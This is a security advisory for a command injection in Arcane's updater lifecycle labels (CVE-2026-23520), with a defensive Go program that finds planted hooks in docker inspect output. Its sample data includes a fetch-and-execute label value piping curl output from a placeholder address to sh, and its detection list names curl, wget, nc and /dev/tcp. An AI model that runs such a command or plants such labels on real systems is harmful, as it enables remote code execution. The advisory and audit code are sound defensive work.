Arcane: Command Injection in Updater Lifecycle Labels Enables RCE (CVE-2026-23520)
Description
Arcane is a Docker management application. Prior to 1.13.0, Arcane's updater service has a command injection. The updater supports the lifecycle labels com.getarcaneapp.arcane.lifecycle.pre-update and com.getarcaneapp.arcane.lifecycle.post-update, which define a command to run before or after a container update. The label value is passed directly to /bin/sh -c without sanitization or validation. Because any authenticated user (not only administrators) can create projects through the API, an attacker can create a project whose container carries one of these lifecycle labels with a malicious command. When an administrator later triggers a container update, whether manually or through the scheduled update checks, Arcane reads the lifecycle label and executes its value as a shell command inside the container. No further interaction from the administrator is needed beyond normal use of the update feature. This vulnerability is fixed in 1.13.0.
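The following Go program is an added example, not code from Arcane or from the advisory. It illustrates the pattern the description names (the raw label value becomes the script argument of /bin/sh -c) and, more usefully for an operator who cannot upgrade immediately, audits `docker inspect` output for containers that carry either lifecycle label, so planted hooks can be found before the next update run. The function names, the `Finding` type, the metacharacter heuristic and the embedded sample JSON are all assumptions constructed for this example; the IP address in the sample is a documentation-range address.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// Label keys named in the advisory.
const (
	PreUpdateLabel  = "com.getarcaneapp.arcane.lifecycle.pre-update"
	PostUpdateLabel = "com.getarcaneapp.arcane.lifecycle.post-update"
)

// vulnerableHookArgv shows the pattern the advisory describes: the label value
// is handed to the shell verbatim, so the whole value is attacker-chosen code.
// Illustration only; this is not Arcane's code.
func vulnerableHookArgv(labelValue string) []string {
	return []string{"/bin/sh", "-c", labelValue}
}

// Finding is one lifecycle hook discovered on a container.
type Finding struct {
	Container  string
	Label      string
	Command    string
	Suspicious bool
}

// inspectEntry is the subset of `docker inspect` output the audit needs.
type inspectEntry struct {
	Name   string `json:"Name"`
	Config struct {
		Labels map[string]string `json:"Labels"`
	} `json:"Config"`
}

// suspicious flags values that do more than name a single program: shell
// operators, redirection, command substitution, fetch-and-execute idioms.
// Every hook found is still executed as a shell command; this only prioritises.
func suspicious(cmd string) bool {
	for _, tok := range []string{";", "&&", "||", "|", "`", "$(", ">", "<", "curl ", "wget ", "nc ", "/dev/tcp"} {
		if strings.Contains(cmd, tok) {
			return true
		}
	}
	return false
}

// AuditInspectOutput parses `docker inspect <ids...>` JSON and returns every
// container that carries an Arcane lifecycle label, in input order.
func AuditInspectOutput(inspectJSON []byte) ([]Finding, error) {
	var entries []inspectEntry
	if err := json.Unmarshal(inspectJSON, &entries); err != nil {
		return nil, err
	}
	var findings []Finding
	for _, e := range entries {
		for _, key := range []string{PreUpdateLabel, PostUpdateLabel} {
			if v, ok := e.Config.Labels[key]; ok {
				findings = append(findings, Finding{
					Container:  strings.TrimPrefix(e.Name, "/"),
					Label:      key,
					Command:    v,
					Suspicious: suspicious(v),
				})
			}
		}
	}
	return findings, nil
}

// sampleInspect is constructed sample data in the shape of `docker inspect`
// output (assumption: only Name and Config.Labels are shown).
const sampleInspect = `[
 {"Name":"/web","Config":{"Labels":{"com.docker.compose.project":"shop"}}},
 {"Name":"/worker","Config":{"Labels":{"com.getarcaneapp.arcane.lifecycle.pre-update":"/app/drain.sh"}}},
 {"Name":"/cache","Config":{"Labels":{"com.getarcaneapp.arcane.lifecycle.post-update":"curl -s http://198.51.100.7/x | sh"}}}
]`

func main() {
	findings, err := AuditInspectOutput([]byte(sampleInspect))
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("%-8s %-50s suspicious=%v argv=%q\n",
			f.Container, f.Label, f.Suspicious, vulnerableHookArgv(f.Command))
	}
}
```

To run it against a live host, replace `sampleInspect` with the output of `docker inspect $(docker ps -aq)`. Any hit is worth reviewing regardless of the `Suspicious` flag, because the advisory's point is that the value is executed as-is: a label set by a non-admin project creator is the attack, whatever it contains.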
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Ecosystem | Affected versions | Patched versions |
|---|---|---|---|
| github.com/getarcaneapp/arcane/backend | Go | < 0.0.0-20260114065515-5a9c2f92e11f | 0.0.0-20260114065515-5a9c2f92e11f |
Affected products
- Range: v0.1.0, v0.1.1, v0.10.0, …
- GHSA coordinates (2 versions): pkg:golang/github.com/getarcaneapp/arcane/backend; pkg:rpm/opensuse/govulncheck-vulndb&distro=openSUSE%20Leap%2015.6; range: < 0.0.0-20260114065515-5a9c2f92e11f (+ 1 more)
- (no CPE) range: < 0.0.0-20260114065515-5a9c2f92e11f
- (no CPE) range: < 0.0.20260123T022811-150000.1.140.1
References
- github.com/advisories/GHSA-gjqq-6r35-w3r8 (GHSA advisory)
- nvd.nist.gov/vuln/detail/CVE-2026-23520 (NVD entry)
- github.com/getarcaneapp/arcane/commit/5a9c2f92e11f86f8997da8c672844468f930b7e4 (fix commit)
- github.com/getarcaneapp/arcane/pull/1468 (fix pull request)
- github.com/getarcaneapp/arcane/releases/tag/v1.13.0 (fixed release)
- github.com/getarcaneapp/arcane/security/advisories/GHSA-gjqq-6r35-w3r8 (project security advisory)